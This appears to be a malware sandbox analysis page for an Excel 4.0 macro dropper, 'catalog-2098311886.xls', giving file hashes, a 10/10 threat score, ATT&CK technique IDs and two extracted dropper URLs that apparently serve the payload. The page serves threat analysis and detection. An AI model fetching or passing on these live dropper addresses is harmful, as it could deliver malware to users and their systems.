Overview

overview

10

Static

static

catalog-20...86.xls

windows7_x64

10

catalog-20...86.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    catalog-2098311886.zip

  • Size

    50KB

  • Sample

    210513-6tl5s1dxx2

  • MD5

    28fe7c08c54da21db4a85a0ceea3ef9f

  • SHA1

    0f3973e4dda9ee5a691d22a2b34cade78aedcf47

  • SHA256

    ad00032538575c81384e45d1db94a63c3bf665966e9200025d5a046fa0b7c170

  • SHA512

    9525ad40dff7c81ef9bdc3d5cec4d755553383703bbdc7ad9346d1d7f36d1ecf4a2ade6a2a5a40e7c02ec99141289e5ffd69dd03cf5ca95135791eb0ba93d378

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://smartpalakatva.com/edQsUZOLlE/th.html
xlm40.dropper

https://pilstlcommodities.com/Ov4FlB3lpy/th.html

Targets

    • Target

      catalog-2098311886.xls

    • Size

      367KB

    • MD5

      39c5464d3ec35720cfd9ce17ffb21009

    • SHA1

      2e72fe2285328d15f7eebb633f3dc932791f66cc

    • SHA256

      59df78797744356567767df8ea3683dd1ff897dc15a90d35fb94fbf1f6f64a8d

    • SHA512

      44aabd54a04a2864c3a9c9e81c60957ad4ced61a2e5d13b07b72fbbac786c5666ce1f83137c6ef9065c491b205982ac46e2cd678aa11aff7085f6dc077464916

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks